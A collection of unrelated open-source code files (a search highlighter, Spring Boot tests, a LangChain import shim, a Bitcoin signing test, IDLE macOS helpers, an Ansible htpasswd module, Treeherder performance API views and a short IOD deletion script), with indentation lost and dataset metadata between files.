# For each docnum, create a mapping of text -> [(startchar, endchar)]
# for the matched terms
results._char_cache[fieldname] = cache = {}
sorted_ids = sorted(docnum for _, docnum in results.top_n)
for docnum in sorted_ids:
cache[docnum] = {}
for text in texts:
btext = to_bytes(text)
m = results.searcher.postings(fieldname, btext)
docset = set(results.termdocs[(fieldname, btext)])
for docnum in sorted_ids:
if docnum in docset:
m.skip_to(docnum)
assert m.id() == docnum
cache[docnum][text] = m.value_as("characters")
@staticmethod
def _merge_matched_tokens(tokens):
# Merges consecutive matched tokens together, so they are highlighted
# as one
token = None
for t in tokens:
if not t.matched:
if token is not None:
yield token
token = None
yield t
continue
if token is None:
token = t.copy()
elif t.startchar <= token.endchar:
if t.endchar > token.endchar:
token.text += t.text[token.endchar-t.endchar:]
token.endchar = t.endchar
else:
yield token
token = None
# t was not merged, also has to be yielded
yield t
if token is not None:
yield token
def highlight_hit(self, hitobj, fieldname, text=None, top=3, minscore=1):
results = hitobj.results
schema = results.searcher.schema
field = schema[fieldname]
to_bytes = field.to_bytes
from_bytes = field.from_bytes
if text is None:
if fieldname not in hitobj:
raise KeyError("Field %r is not stored." % fieldname)
text = hitobj[fieldname]
# Get the terms searched for/matched in this field
if results.has_matched_terms():
bterms = (term for term in results.matched_terms()
if term[0] == fieldname)
else:
bterms = results.query_terms(expand=True, fieldname=fieldname)
# Convert bytes to unicode
words = frozenset(from_bytes(term[1]) for term in bterms)
# If we can do "pinpoint" highlighting...
if self.can_load_chars(results, fieldname):
# Build the docnum->[(startchar, endchar),] map
if fieldname not in results._char_cache:
self._load_chars(results, fieldname, words, to_bytes)
hitterms = (from_bytes(term[1]) for term in hitobj.matched_terms()
if term[0] == fieldname)
# Grab the word->[(startchar, endchar)] map for this docnum
cmap = results._char_cache[fieldname][hitobj.docnum]
# A list of Token objects for matched words
tokens = []
charlimit = self.fragmenter.charlimit
for word in hitterms:
chars = cmap[word]
for pos, startchar, endchar in chars:
if charlimit and endchar > charlimit:
break
tokens.append(Token(text=word, pos=pos,
startchar=startchar, endchar=endchar))
tokens.sort(key=lambda t: t.startchar)
tokens = [max(group, key=lambda t: t.endchar - t.startchar)
for key, group in groupby(tokens, lambda t: t.startchar)]
fragments = self.fragmenter.fragment_matches(text, tokens)
else:
# Retokenize the text
analyzer = results.searcher.schema[fieldname].analyzer
tokens = analyzer(text, positions=True, chars=True, mode="index",
removestops=False)
# Set Token.matched attribute for tokens that match a query term
tokens = set_matched_filter(tokens, words)
tokens = self._merge_matched_tokens(tokens)
fragments = self.fragmenter.fragment_tokens(text, tokens)
fragments = top_fragments(fragments, top, self.scorer, self.order,
minscore=minscore)
output = self.formatter.format(fragments)
return output
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.info;
import java.util.Properties;
import org.jspecify.annotations.Nullable;
import org.junit.jupiter.api.Test;
import org.springframework.aot.hint.RuntimeHints;
import org.springframework.aot.hint.predicate.RuntimeHintsPredicates;
import static org.assertj.core.api.Assertions.assertThat;
/**
* Tests for {@link GitProperties}.
*
* @author Stephane Nicoll
* @author Moritz Halbritter
*/
class GitPropertiesTests {
@Test
void basicInfo() {
GitProperties properties = new GitProperties(
createProperties("master", "abcdefghijklmno", "abcdefg", "1457527123"));
assertThat(properties.getBranch()).isEqualTo("master");
assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
assertThat(properties.getShortCommitId()).isEqualTo("abcdefg");
}
@Test
void noInfo() {
GitProperties properties = new GitProperties(new Properties());
assertThat(properties.getBranch()).isNull();
assertThat(properties.getCommitId()).isNull();
assertThat(properties.getShortCommitId()).isNull();
assertThat(properties.getCommitTime()).isNull();
}
@Test
void coerceEpochSecond() {
GitProperties properties = new GitProperties(createProperties("master", "abcdefg", null, "1457527123"));
assertThat(properties.getCommitTime()).isNotNull();
assertThat(properties.get("commit.time")).isEqualTo("1457527123000");
assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457527123000L);
}
@Test
void coerceLegacyDateString() {
GitProperties properties = new GitProperties(
createProperties("master", "abcdefg", null, "2016-03-04T14:36:33+0100"));
assertThat(properties.getCommitTime()).isNotNull();
assertThat(properties.get("commit.time")).isEqualTo("1457098593000");
assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457098593000L);
}
@Test
void coerceDateString() {
GitProperties properties = new GitProperties(
createProperties("master", "abcdefg", null, "2016-03-04T14:36:33+01:00"));
assertThat(properties.getCommitTime()).isNotNull();
assertThat(properties.get("commit.time")).isEqualTo("1457098593000");
assertThat(properties.getCommitTime().toEpochMilli()).isEqualTo(1457098593000L);
}
@Test
void coerceUnsupportedFormat() {
GitProperties properties = new GitProperties(
createProperties("master", "abcdefg", null, "2016-03-04 15:22:24"));
assertThat(properties.getCommitTime()).isNull();
assertThat(properties.get("commit.time")).isEqualTo("2016-03-04 15:22:24");
}
@Test
void shortCommitUsedIfPresent() {
GitProperties properties = new GitProperties(
createProperties("master", "abcdefghijklmno", "abcdefgh", "1457527123"));
assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
assertThat(properties.getShortCommitId()).isEqualTo("abcdefgh");
}
@Test
void shortenCommitIdShorterThan7() {
GitProperties properties = new GitProperties(createProperties("master", "abc", null, "1457527123"));
assertThat(properties.getCommitId()).isEqualTo("abc");
assertThat(properties.getShortCommitId()).isEqualTo("abc");
}
@Test
void shortenCommitIdLongerThan7() {
GitProperties properties = new GitProperties(createProperties("master", "abcdefghijklmno", null, "1457527123"));
assertThat(properties.getCommitId()).isEqualTo("abcdefghijklmno");
assertThat(properties.getShortCommitId()).isEqualTo("abcdefg");
}
@Test
void shouldRegisterHints() {
RuntimeHints runtimeHints = new RuntimeHints();
new GitProperties.GitPropertiesRuntimeHints().registerHints(runtimeHints, getClass().getClassLoader());
assertThat(RuntimeHintsPredicates.resource().forResource("git.properties")).accepts(runtimeHints);
}
private static Properties createProperties(String branch, String commitId, @Nullable String commitIdAbbrev,
String commitTime) {
Properties properties = new Properties();
properties.put("branch", branch);
properties.put("commit.id", commitId);
if (commitIdAbbrev != null) {
properties.put("commit.id.abbrev", commitIdAbbrev);
}
properties.put("commit.time", commitTime);
return properties;
}
}
|
java
|
github
|
https://github.com/spring-projects/spring-boot
|
core/spring-boot/src/test/java/org/springframework/boot/info/GitPropertiesTests.java
|
from typing import TYPE_CHECKING, Any
from langchain_classic._api import create_importer
if TYPE_CHECKING:
from langchain_community.document_loaders import MongodbLoader
# Create a way to dynamically look up deprecated imports.
# Used to consolidate logic for raising deprecation warnings and
# handling optional imports.
DEPRECATED_LOOKUP = {"MongodbLoader": "langchain_community.document_loaders"}
_import_attribute = create_importer(__package__, deprecated_lookups=DEPRECATED_LOOKUP)
def __getattr__(name: str) -> Any:
"""Look up attributes dynamically."""
return _import_attribute(name)
__all__ = [
"MongodbLoader",
]
|
python
|
github
|
https://github.com/langchain-ai/langchain
|
libs/langchain/langchain_classic/document_loaders/mongodb.py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# parts taken from weirdtx.py
import test_framework.loginit
import time
import sys
if sys.version_info[0] < 3:
raise "Use Python 3"
import logging
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
from test_framework.script import *
from test_framework.key import *
from binascii import unhexlify, hexlify
def Hash256Puzzle(s):
if type(s) is str:
s = s.encode()
ret = CScript([OP_HASH256, hash256(s), OP_EQUAL])
return ret
def MatchString(s):
if type(s) is str:
s = s.encode()
ret = CScript([s, OP_EQUAL])
return ret
def p2pkh_list(addr):
return [OP_DUP, OP_HASH160, bitcoinAddress2bin(addr), OP_EQUALVERIFY, OP_CHECKSIG]
def SignWithAorB(twoAddrs):
ret = CScript([OP_IF] + p2pkh_list(twoAddrs[0]) + [OP_ELSE] + p2pkh_list(twoAddrs[1]) + [OP_ENDIF])
return ret
class SigHashMatchTest(BitcoinTestFramework):
def setup_chain(self, bitcoinConfDict, wallets=None):
print("Initializing test directory " + self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 2, bitcoinConfDict, wallets)
def setup_network(self, split=False):
self.nodes = start_nodes(2, self.options.tmpdir)
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split = False
self.sync_all()
def run_test(self):
# generate enough blocks so that nodes[0] has a balance
self.sync_blocks()
self.nodes[0].generate(150)
self.sync_blocks()
unspents = self.nodes[0].listunspent()
unspents.sort(key=lambda x: x["amount"], reverse=False)
utxo = unspents.pop()
amt = utxo["amount"]
addr = utxo["address"]
outp = {"dummy" : amt - decimal.Decimal(.0001)} # give some fee
txn = CTransaction().deserialize(createrawtransaction([utxo], outp, p2pkh))
# create signature manually using txn.SignatureHash() calculation
# plus the new signdata RPC call, append the sighashbyte and make sure
# it is accepted by the node.
privkey = self.nodes[0].dumpprivkey(addr)
key = CECKey()
key.set_secretbytes(decodeBase58(privkey)[1:-5])
key.set_compressed(True)
pub = key.get_pubkey()
sighashcode = CScript([pub, OP_CHECKSIG])
sighash = txn.SignatureHash(0, bytes(sighashcode),
int((amt)*100000000))
txn_mansig = unhexlify(self.nodes[0].signdata(addr, "hash",
hexlify(sighash).decode("ascii")))
fullsig = txn_mansig+b"\x41"
txn.vin[0].scriptSig = CScript([fullsig])
txid = self.nodes[0].sendrawtransaction(txn.toHex())
assert len(txid) == 64
if __name__ == '__main__':
SigHashMatchTest().main(bitcoinConfDict = {"usecashaddr" : 0})
# Create a convenient function for an interactive python debugging session
def Test():
t = SigHashMatchTest()
bitcoinConf = {
"debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"],
"blockprioritysize": 2000000, # we don't want any transactions rejected due to insufficient fees...
"usecashaddr" : False
}
# you may want these additional flags:
# "--srcdir=<out-of-source-build-dir>/debug/src"
# "--tmppfx=/ramdisk/test"
flags = [] # "--nocleanup", "--noshutdown"
if os.path.isdir("/ramdisk/test"): # execution is much faster if a ramdisk is used
flags.append("--tmppfx=/ramdisk/test")
t.main(flags, bitcoinConf, None)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
A number of function that enhance IDLE on MacOSX when it used as a normal
GUI application (as opposed to an X11 application).
"""
import sys
import Tkinter
from os import path
_appbundle = None
def runningAsOSXApp():
"""
Returns True if Python is running from within an app on OSX.
If so, assume that Python was built with Aqua Tcl/Tk rather than
X11 Tcl/Tk.
"""
global _appbundle
if _appbundle is None:
_appbundle = (sys.platform == 'darwin' and '.app' in sys.executable)
return _appbundle
_carbonaquatk = None
def isCarbonAquaTk(root):
"""
Returns True if IDLE is using a Carbon Aqua Tk (instead of the
newer Cocoa Aqua Tk).
"""
global _carbonaquatk
if _carbonaquatk is None:
_carbonaquatk = (runningAsOSXApp() and
'aqua' in root.tk.call('tk', 'windowingsystem') and
'AppKit' not in root.tk.call('winfo', 'server', '.'))
return _carbonaquatk
def tkVersionWarning(root):
"""
Returns a string warning message if the Tk version in use appears to
be one known to cause problems with IDLE. The Apple Cocoa-based Tk 8.5
that was shipped with Mac OS X 10.6.
"""
if (runningAsOSXApp() and
('AppKit' in root.tk.call('winfo', 'server', '.')) and
(root.tk.call('info', 'patchlevel') == '8.5.7') ):
return (r"WARNING: The version of Tcl/Tk (8.5.7) in use may"
r" be unstable.\n"
r"Visit http://www.python.org/download/mac/tcltk/"
r" for current information.")
else:
return False
def addOpenEventSupport(root, flist):
"""
This ensures that the application will respond to open AppleEvents, which
makes is feasible to use IDLE as the default application for python files.
"""
def doOpenFile(*args):
for fn in args:
flist.open(fn)
# The command below is a hook in aquatk that is called whenever the app
# receives a file open event. The callback can have multiple arguments,
# one for every file that should be opened.
root.createcommand("::tk::mac::OpenDocument", doOpenFile)
def hideTkConsole(root):
try:
root.tk.call('console', 'hide')
except Tkinter.TclError:
# Some versions of the Tk framework don't have a console object
pass
def overrideRootMenu(root, flist):
"""
Replace the Tk root menu by something that's more appropriate for
IDLE.
"""
# The menu that is attached to the Tk root (".") is also used by AquaTk for
# all windows that don't specify a menu of their own. The default menubar
# contains a number of menus, none of which are appropriate for IDLE. The
# Most annoying of those is an 'About Tck/Tk...' menu in the application
# menu.
#
# This function replaces the default menubar by a mostly empty one, it
# should only contain the correct application menu and the window menu.
#
# Due to a (mis-)feature of TkAqua the user will also see an empty Help
# menu.
from Tkinter import Menu, Text, Text
from idlelib.EditorWindow import prepstr, get_accelerator
from idlelib import Bindings
from idlelib import WindowList
from idlelib.MultiCall import MultiCallCreator
menubar = Menu(root)
root.configure(menu=menubar)
menudict = {}
menudict['windows'] = menu = Menu(menubar, name='windows')
menubar.add_cascade(label='Window', menu=menu, underline=0)
def postwindowsmenu(menu=menu):
end = menu.index('end')
if end is None:
end = -1
if end > 0:
menu.delete(0, end)
WindowList.add_windows_to_menu(menu)
WindowList.register_callback(postwindowsmenu)
def about_dialog(event=None):
from idlelib import aboutDialog
aboutDialog.AboutDialog(root, 'About IDLE')
def config_dialog(event=None):
from idlelib import configDialog
root.instance_dict = flist.inversedict
configDialog.ConfigDialog(root, 'Settings')
def help_dialog(event=None):
from idlelib import textView
fn = path.join(path.abspath(path.dirname(__file__)), 'help.txt')
textView.view_file(root, 'Help', fn)
root.bind('<<about-idle>>', about_dialog)
root.bind('<<open-config-dialog>>', config_dialog)
root.createcommand('::tk::mac::ShowPreferences', config_dialog)
if flist:
root.bind('<<close-all-windows>>', flist.close_all_callback)
# The binding above doesn't reliably work on all versions of Tk
# on MacOSX. Adding command definition below does seem to do the
# right thing for now.
root.createcommand('exit', flist.close_all_callback)
if isCarbonAquaTk(root):
# for Carbon AquaTk, replace the default Tk apple menu
menudict['application'] = menu = Menu(menubar, name='apple')
menubar.add_cascade(label='IDLE', menu=menu)
Bindings.menudefs.insert(0,
('application', [
('About IDLE', '<<about-idle>>'),
None,
]))
tkversion = root.tk.eval('info patchlevel')
if tuple(map(int, tkversion.split('.'))) < (8, 4, 14):
# for earlier AquaTk versions, supply a Preferences menu item
Bindings.menudefs[0][1].append(
('_Preferences....', '<<open-config-dialog>>'),
)
else:
# assume Cocoa AquaTk
# replace default About dialog with About IDLE one
root.createcommand('tkAboutDialog', about_dialog)
# replace default "Help" item in Help menu
root.createcommand('::tk::mac::ShowHelp', help_dialog)
# remove redundant "IDLE Help" from menu
del Bindings.menudefs[-1][1][0]
def setupApp(root, flist):
"""
Perform setup for the OSX application bundle.
"""
if not runningAsOSXApp(): return
hideTkConsole(root)
overrideRootMenu(root, flist)
addOpenEventSupport(root, flist)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Nimbis Services, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
module: htpasswd
version_added: "1.3"
short_description: manage user files for basic authentication
description:
- Add and remove username/password entries in a password file using htpasswd.
- This is used by web servers such as Apache and Nginx for basic authentication.
options:
path:
required: true
aliases: [ dest, destfile ]
description:
- Path to the file that contains the usernames and passwords
name:
required: true
aliases: [ username ]
description:
- User name to add or remove
password:
required: false
description:
- Password associated with user.
- Must be specified if user does not exist yet.
crypt_scheme:
required: false
choices: ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
default: "apr_md5_crypt"
description:
- Encryption scheme to be used.
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the user entry should be present or not
create:
required: false
choices: [ "yes", "no" ]
default: "yes"
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. If set to "no", will fail if the
file does not exist
notes:
- "This module depends on the I(passlib) Python library, which needs to be installed on all target systems."
- "On Debian, Ubuntu, or Fedora: install I(python-passlib)."
- "On RHEL or CentOS: Enable EPEL, then install I(python-passlib)."
requires: [ passlib>=1.6 ]
author: Lorin Hochstein
"""
EXAMPLES = """
# Add a user to a password file and ensure permissions are set
- htpasswd: path=/etc/nginx/passwdfile name=janedoe password=9s36?;fyNp owner=root group=www-data mode=0640
# Remove a user from a password file
- htpasswd: path=/etc/apache2/passwdfile name=foobar state=absent
"""
import os
from distutils.version import StrictVersion
try:
from passlib.apache import HtpasswdFile
import passlib
except ImportError:
passlib_installed = False
else:
passlib_installed = True
def create_missing_directories(dest):
destpath = os.path.dirname(dest)
if not os.path.exists(destpath):
os.makedirs(destpath)
def present(dest, username, password, crypt_scheme, create, check_mode):
""" Ensures user is present
Returns (msg, changed) """
if not os.path.exists(dest):
if not create:
raise ValueError('Destination %s does not exist' % dest)
if check_mode:
return ("Create %s" % dest, True)
create_missing_directories(dest)
if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
ht = HtpasswdFile(dest, new=True, default_scheme=crypt_scheme)
else:
ht = HtpasswdFile(dest, autoload=False, default=crypt_scheme)
if getattr(ht, 'set_password', None):
ht.set_password(username, password)
else:
ht.update(username, password)
ht.save()
return ("Created %s and added %s" % (dest, username), True)
else:
if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
ht = HtpasswdFile(dest, new=False, default_scheme=crypt_scheme)
else:
ht = HtpasswdFile(dest, default=crypt_scheme)
found = None
if getattr(ht, 'check_password', None):
found = ht.check_password(username, password)
else:
found = ht.verify(username, password)
if found:
return ("%s already present" % username, False)
else:
if not check_mode:
if getattr(ht, 'set_password', None):
ht.set_password(username, password)
else:
ht.update(username, password)
ht.save()
return ("Add/update %s" % username, True)
def absent(dest, username, check_mode):
""" Ensures user is absent
Returns (msg, changed) """
if not os.path.exists(dest):
raise ValueError("%s does not exists" % dest)
if StrictVersion(passlib.__version__) >= StrictVersion('1.6'):
ht = HtpasswdFile(dest, new=False)
else:
ht = HtpasswdFile(dest)
if username not in ht.users():
return ("%s not present" % username, False)
else:
if not check_mode:
ht.delete(username)
ht.save()
return ("Remove %s" % username, True)
def check_file_attrs(module, changed, message):
file_args = module.load_file_common_arguments(module.params)
if module.set_fs_attributes_if_different(file_args, False):
if changed:
message += " and "
changed = True
message += "ownership, perms or SE linux context changed"
return message, changed
def main():
arg_spec = dict(
path=dict(required=True, aliases=["dest", "destfile"]),
name=dict(required=True, aliases=["username"]),
password=dict(required=False, default=None),
crypt_scheme=dict(required=False, default=None),
state=dict(required=False, default="present"),
create=dict(type='bool', default='yes'),
)
module = AnsibleModule(argument_spec=arg_spec,
add_file_common_args=True,
supports_check_mode=True)
path = module.params['path']
username = module.params['name']
password = module.params['password']
crypt_scheme = module.params['crypt_scheme']
state = module.params['state']
create = module.params['create']
check_mode = module.check_mode
if not passlib_installed:
module.fail_json(msg="This module requires the passlib Python library")
try:
if state == 'present':
(msg, changed) = present(path, username, password, crypt_scheme, create, check_mode)
elif state == 'absent':
(msg, changed) = absent(path, username, check_mode)
else:
module.fail_json(msg="Invalid state: %s" % state)
check_file_attrs(module, changed, msg)
module.exit_json(msg=msg, changed=changed)
except Exception, e:
module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import datetime
import time
from collections import defaultdict
import django_filters
from django.conf import settings
from rest_framework import (exceptions,
filters,
pagination,
viewsets)
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST
from treeherder.model import models
from treeherder.perf.alerts import get_alert_properties
from treeherder.perf.models import (PerformanceAlert,
PerformanceAlertSummary,
PerformanceBugTemplate,
PerformanceDatum,
PerformanceFramework,
PerformanceSignature)
from treeherder.webapp.api.permissions import IsStaffOrReadOnly
from .performance_serializers import (PerformanceAlertSerializer,
PerformanceAlertSummarySerializer,
PerformanceBugTemplateSerializer,
PerformanceFrameworkSerializer)
class PerformanceSignatureViewSet(viewsets.ViewSet):
def list(self, request, project):
repository = models.Repository.objects.get(name=project)
signature_data = PerformanceSignature.objects.filter(
repository=repository).select_related(
'parent_signature__signature_hash', 'option_collection',
'platform')
parent_signature_hashes = request.query_params.getlist('parent_signature')
if parent_signature_hashes:
parent_signatures = PerformanceSignature.objects.filter(
repository=repository,
signature_hash__in=parent_signature_hashes)
signature_data = signature_data.filter(
parent_signature__in=parent_signatures)
if not int(request.query_params.get('subtests', True)):
signature_data = signature_data.filter(parent_signature__isnull=True)
signature_ids = request.query_params.getlist('id')
if signature_ids:
signature_data = signature_data.filter(id__in=map(int,
signature_ids))
signature_hashes = request.query_params.getlist('signature')
if signature_hashes:
signature_data = signature_data.filter(
signature_hash__in=signature_hashes)
frameworks = request.query_params.getlist('framework')
if frameworks:
signature_data = signature_data.filter(
framework__in=frameworks)
interval = request.query_params.get('interval')
start_date = request.query_params.get('start_date') # 'YYYY-MM-DDTHH:MM:SS
end_date = request.query_params.get('end_date') # 'YYYY-MM-DDTHH:MM:SS'
if interval and (start_date or end_date):
return Response({"message": "Provide either interval only -or- start (and end) date"},
status=HTTP_400_BAD_REQUEST)
if interval:
signature_data = signature_data.filter(
last_updated__gte=datetime.datetime.utcfromtimestamp(
int(time.time() - int(interval))))
if start_date:
signature_data = signature_data.filter(last_updated__gte=start_date)
if end_date:
signature_data = signature_data.filter(last_updated__lte=end_date)
platform = request.query_params.get('platform')
if platform:
platforms = models.MachinePlatform.objects.filter(
platform=platform)
signature_data = signature_data.filter(
platform__in=platforms)
ret = {}
for (id, signature_hash, option_collection_hash, platform, framework,
suite, test, lower_is_better, extra_options,
has_subtests, parent_signature_hash) in signature_data.values_list(
'id',
'signature_hash',
'option_collection__option_collection_hash',
'platform__platform', 'framework', 'suite',
'test', 'lower_is_better',
'extra_options', 'has_subtests',
'parent_signature__signature_hash').distinct():
ret[signature_hash] = {
'id': id,
'framework_id': framework,
'option_collection_hash': option_collection_hash,
'machine_platform': platform,
'suite': suite
}
if not lower_is_better:
# almost always true, save some banwidth by assuming that by
# default
ret[signature_hash]['lower_is_better'] = False
if test:
# test may be empty in case of a summary test, leave it empty
# then
ret[signature_hash]['test'] = test
if has_subtests:
ret[signature_hash]['has_subtests'] = True
if parent_signature_hash:
# this value is often null, save some bandwidth by excluding
# it if not present
ret[signature_hash]['parent_signature'] = parent_signature_hash
if extra_options:
# extra_options stored as charField but api returns as list
ret[signature_hash]['extra_options'] = extra_options.split(' ')
return Response(ret)
class PerformancePlatformViewSet(viewsets.ViewSet):
"""
All platforms for a particular branch that have performance data
"""
def list(self, request, project):
signature_data = PerformanceSignature.objects.filter(
repository__name=project)
interval = request.query_params.get('interval')
if interval:
signature_data = signature_data.filter(
last_updated__gte=datetime.datetime.utcfromtimestamp(
int(time.time() - int(interval))))
frameworks = request.query_params.getlist('framework')
if frameworks:
signature_data = signature_data.filter(
framework__in=frameworks)
return Response(signature_data.values_list(
'platform__platform', flat=True).distinct())
class PerformanceFrameworkViewSet(viewsets.ReadOnlyModelViewSet):
queryset = PerformanceFramework.objects.all()
serializer_class = PerformanceFrameworkSerializer
filter_backends = [filters.OrderingFilter]
ordering = 'id'
class PerformanceDatumViewSet(viewsets.ViewSet):
"""
This view serves performance test result data
"""
def list(self, request, project):
repository = models.Repository.objects.get(name=project)
signature_hashes = request.query_params.getlist("signatures")
push_ids = request.query_params.getlist("push_id")
try:
job_ids = [int(job_id) for job_id in
request.query_params.getlist("job_id")]
except ValueError:
return Response({"message": "Job id(s) must be specified as integers"},
status=HTTP_400_BAD_REQUEST)
if not (signature_hashes or push_ids or job_ids):
raise exceptions.ValidationError('Need to specify either '
'signatures, push_id, or '
'job_id')
datums = PerformanceDatum.objects.filter(
repository=repository).select_related(
'signature__signature_hash').order_by('push_timestamp')
if signature_hashes:
signature_ids = PerformanceSignature.objects.filter(
repository=repository,
signature_hash__in=signature_hashes).values_list('id', flat=True)
datums = datums.filter(signature__id__in=list(signature_ids))
if push_ids:
datums = datums.filter(push_id__in=push_ids)
if job_ids:
datums = datums.filter(job_id__in=job_ids)
frameworks = request.query_params.getlist('framework')
if frameworks:
datums = datums.filter(
signature__framework__in=frameworks)
interval = request.query_params.get('interval')
start_date = request.query_params.get('start_date') # 'YYYY-MM-DDTHH:MM:SS
end_date = request.query_params.get('end_date') # 'YYYY-MM-DDTHH:MM:SS'
if interval and (start_date or end_date):
return Response({"message": "Provide either interval only -or- start (and end) date"},
status=HTTP_400_BAD_REQUEST)
if interval:
datums = datums.filter(
push_timestamp__gt=datetime.datetime.utcfromtimestamp(
int(time.time() - int(interval))))
if start_date:
datums = datums.filter(push_timestamp__gt=start_date)
if end_date:
datums = datums.filter(push_timestamp__lt=end_date)
ret = defaultdict(list)
values_list = datums.values_list(
'id', 'signature_id', 'signature__signature_hash', 'job_id', 'push_id',
'push_timestamp', 'value')
for (id, signature_id, signature_hash, job_id, push_id,
push_timestamp, value) in values_list:
ret[signature_hash].append({
'id': id,
'signature_id': signature_id,
'job_id': job_id,
'push_id': push_id,
'push_timestamp': int(time.mktime(push_timestamp.timetuple())),
'value': round(value, 2) # round to 2 decimal places
})
return Response(ret)
class AlertSummaryPagination(pagination.PageNumberPagination):
ordering = ('-last_updated', '-id')
page_size = 10
class PerformanceAlertSummaryViewSet(viewsets.ModelViewSet):
"""ViewSet for the performance alert summary model"""
queryset = PerformanceAlertSummary.objects.filter(repository__active_status='active').prefetch_related(
'alerts', 'alerts__series_signature',
'repository',
'alerts__series_signature__platform',
'alerts__series_signature__option_collection',
'alerts__series_signature__option_collection__option')
permission_classes = (IsStaffOrReadOnly,)
serializer_class = PerformanceAlertSummarySerializer
filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
filter_fields = ['id', 'status', 'framework', 'repository',
'alerts__series_signature__signature_hash']
ordering = ('-last_updated', '-id')
pagination_class = AlertSummaryPagination
def create(self, request, *args, **kwargs):
data = request.data
alert_summary, _ = PerformanceAlertSummary.objects.get_or_create(
repository_id=data['repository_id'],
framework=PerformanceFramework.objects.get(id=data['framework_id']),
push_id=data['push_id'],
prev_push_id=data['prev_push_id'],
defaults={
'manually_created': True,
'last_updated': datetime.datetime.now()
})
return Response({"alert_summary_id": alert_summary.id})
class PerformanceAlertViewSet(viewsets.ModelViewSet):
queryset = PerformanceAlert.objects.all()
permission_classes = (IsStaffOrReadOnly,)
serializer_class = PerformanceAlertSerializer
filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
filter_fields = ['id']
ordering = ('-id')
class AlertPagination(pagination.CursorPagination):
ordering = ('-id')
page_size = 10
pagination_class = AlertPagination
def update(self, request, *args, **kwargs):
request.data['classifier'] = request.user.email
return super(PerformanceAlertViewSet, self).update(request, *args, **kwargs)
def create(self, request, *args, **kwargs):
data = request.data
if 'summary_id' not in data or 'signature_id' not in data:
return Response({"message": "Summary and signature ids necessary "
"to create alert"}, status=HTTP_400_BAD_REQUEST)
summary = PerformanceAlertSummary.objects.get(
id=data['summary_id'])
signature = PerformanceSignature.objects.get(
id=data['signature_id'])
prev_range = signature.max_back_window
if not prev_range:
prev_range = settings.PERFHERDER_ALERTS_MAX_BACK_WINDOW
new_range = signature.fore_window
if not new_range:
new_range = settings.PERFHERDER_ALERTS_FORE_WINDOW
prev_data = PerformanceDatum.objects.filter(
signature=signature,
push_timestamp__lte=summary.prev_push.time).order_by(
'-push_timestamp').values_list('value', flat=True)[:prev_range]
new_data = PerformanceDatum.objects.filter(
signature=signature,
push_timestamp__gt=summary.prev_push.time).order_by(
'push_timestamp').values_list('value', flat=True)[:new_range]
if not prev_data or not new_data:
return Response({"message": "Insufficient data to create an "
"alert"}, status=HTTP_400_BAD_REQUEST)
prev_value = sum(prev_data)/len(prev_data)
new_value = sum(new_data)/len(new_data)
alert_properties = get_alert_properties(prev_value, new_value,
signature.lower_is_better)
alert, _ = PerformanceAlert.objects.get_or_create(
summary=summary,
series_signature=signature,
defaults={
'is_regression': alert_properties.is_regression,
'manually_created': True,
'amount_pct': alert_properties.pct_change,
'amount_abs': alert_properties.delta,
'prev_value': prev_value,
'new_value': new_value,
't_value': 1000
})
return Response({"alert_id": alert.id})
class PerformanceBugTemplateViewSet(viewsets.ReadOnlyModelViewSet):
queryset = PerformanceBugTemplate.objects.all()
serializer_class = PerformanceBugTemplateSerializer
filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
filter_fields = ['framework']
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
import os
import unirest
import time
import json
import pprint
import logging
import argparse
unirest.timeout(120)
IODAPIKEY = os.environ.get('IODAPIKEY')
parser = argparse.ArgumentParser(description='Delete an IOD web connector and its associated text index')
parser.add_argument('--apikey', default=IODAPIKEY)
parser.add_argument('--name', default='')
args = parser.parse_args()
apikey = args.apikey
if apikey:
logging.info("Using apikey: %s" % apikey)
else:
logging.critical("No apikey supplied. Exiting.")
exit(1)
name = args.name
if name:
logging.info("Deleting index/connector: %s" % name)
else:
logging.critical("No name supplied. Exiting.")
exit(1)
# Now delete the index. Call first to get the confirmation token
